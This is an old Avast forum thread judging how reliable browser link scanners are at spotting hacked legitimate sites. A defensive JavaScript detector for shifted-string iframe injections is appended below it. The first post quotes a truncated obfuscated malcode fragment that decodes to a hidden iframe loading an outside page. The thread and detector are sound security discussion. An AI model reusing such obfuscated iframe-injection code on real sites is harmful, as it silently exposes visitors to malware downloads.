Author Topic: What is the use of browser link scanners - How reliable are they?  (Read 2069 times)

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33925
  • malware fighter
Hi malware fighters,

I tested the following part of malcode that was reported in the virus and worms section from a find on a hacked legit web site as a Google search request to see how link scanners would react to these pages that avast would flag and then disconnect from. The results are not very reassuring.
This was the request; you can put it into your Google search form and see for yourself (do not click on the result pages given as green, because all may be infected through the so-called Islamabad hack!)
Code:
var k1='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A?liudph#vuf@%kwws=22
was the search query.
On the first result page the first two did not count because they were from avast forum.
Best performance was finjan 2 flagged as potential virus can harm your computer on three result pages.
One result flagged by WOT but not because of the code but because of the site's reputation, one yellow for another one. McAfeeSiteAdvisor missed all.
DrWeb's av link checker missed these because the malcode was not in the same domain...

So if you want to use a link checker I would choose finjan secure browsing, but even the performance of this scanner is poor. Best is the avast live browser shield scanning. And also the full protection of Firefox browser with NoScript and RequestPolicy add-ons installed.

My opinion of the present pre-link scanning results - pretty worthless in this case,

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline Lisandro

  • Avast team
  • Certainly Bot
  • *
  • Posts: 67194
Re: What is the use of browser link scanners - How reliable are they?
« Reply #1 on: July 08, 2009, 07:14:09 PM »
Best performance was finjan 2 flagged as potential virus can harm your computer on three result pages.
One result flagged by WOT but not because of the code but because of the site's reputation, one yellow for another one. McAfeeSiteAdvisor missed all.
DrWeb's av link checker missed these because the malcode was not in the same domain...
I'm glad to have chosen Finjan + avast ;)
The best things in life are free.

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33925
  • malware fighter
Re: What is the use of browser link scanners - How reliable are they?
« Reply #2 on: July 09, 2009, 12:47:00 AM »
Hi malware fighters.

But did you perform the test? Just try and give the short bit of that particular code in as a search query that is scanned through finjan, WOT, or on scandoo.com and you will establish how poorly these "real time scanners" or partly reputation scanners handle code on legit sites that were hacked and re-direct to "malware all sorts" on behalf of CyberCrime & Co et al.
That is the new situation, my good forum friends, a new massive threat that goes largely unnoticed by these scanners (80%). At http://www.unmaskparasites.com/security-report/ based on Google's security website report I get a much better score here and an indication of what is wrong and attached to the source code, and real scanners like Anubis also give these in-depth reports.
Even with Firekeeper with appropriate rules for detecting malcode the results would be better. What do link scanners do other than link, not much. They do not tell that on site so-and-so I will be confronted with obfuscated script, that I would like to deny access, that there is third party embedded script there, that I like to refuse anyway, or hidden iFrames that might take me to a silent download site with a dozen malcode scripts trying out exploits on my unpatched browser and other software vulnerabilities that I failed to update (I check that now with Secunia's PSI). So NoScript is on one side of the spectrum protecting me. What is there on the other side of the spectrum, the detecting side? I do not want to be a victim of some self-proclaimed website admin that does not know how to secure his code or protect his website software. Well, old pol knows how to protect himself through SafeHex, limiting access to what should not have access on the OS, limiting rights to what should not have, and denying access to code to block malicious code insertions, but that cannot harm me much because normally malware can do as much harm as limited under normal user's rights (so even curtail system rights in certain circumstances). But what about the average user of a browser? Can they rely on the link scanner greens or halt for reds? I would not like to have these on a railway track, if I run a train like that a derailment would be round the corner I think. A lot of security here is make-believe, folks, you rely on a validation made at a certain point in time and then the assessment can be totally wrong in a large percentage of cases,

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!
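
Added illustration, not part of any forum post above: the fragment quoted in the first post is a character-shifted string, and a static check on the "detecting side" discussed in Reply #2 can decode and flag it without executing anything. The function names, the shift range tried and the hidden-style heuristics are assumptions of this example; the shift of 3 is simply what the decoder finds for the quoted fragment.

```javascript
// Added example: static detection of character-shifted string literals hiding iframe markup.
// SAMPLE is the truncated fragment quoted in the first post; it is inert data, never evaluated.
const SAMPLE = `var k1='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A?liudph#vuf@%kwws=22`;

// Undo a fixed additive shift by subtracting `shift` from every character code.
function unshift(text, shift) {
  return Array.from(text, c => String.fromCharCode(c.charCodeAt(0) - shift)).join('');
}

// Extract quoted string literals from script source. A missing closing quote is
// tolerated because injected code is often seen only as a fragment.
function stringLiterals(source) {
  const out = [];
  const re = /(['"])((?:\\.|(?!\1)[^\\])*)(?:\1|$)/g;
  let m;
  while ((m = re.exec(source)) !== null) {
    if (m[2].length >= 16) out.push(m[2]); // very short literals cannot hold markup
  }
  return out;
}

// Heuristics (assumed for this example) for markup meant to be invisible to the visitor.
const HIDDEN = /visibility\s*:\s*hidden|display\s*:\s*none|(?:width|height)\s*=\s*["']?[01]\b/i;

// Try each shift from 0 (plain text) to maxShift on every literal and report
// those that decode to iframe markup, noting whether it is styled as hidden.
function analyse(source, maxShift = 10) {
  const findings = [];
  for (const literal of stringLiterals(source)) {
    for (let shift = 0; shift <= maxShift; shift++) {
      const decoded = unshift(literal, shift);
      if (/<iframe\b/i.test(decoded)) {
        findings.push({ shift, hidden: HIDDEN.test(decoded), decoded });
      }
    }
  }
  return findings;
}

for (const f of analyse(SAMPLE)) {
  console.log(`shift=${f.shift} hidden=${f.hidden} decoded=${f.decoded}`);
}
```

A reputation lookup on the hosting domain never sees this, because the finding comes from the page's own script content rather than from the URL.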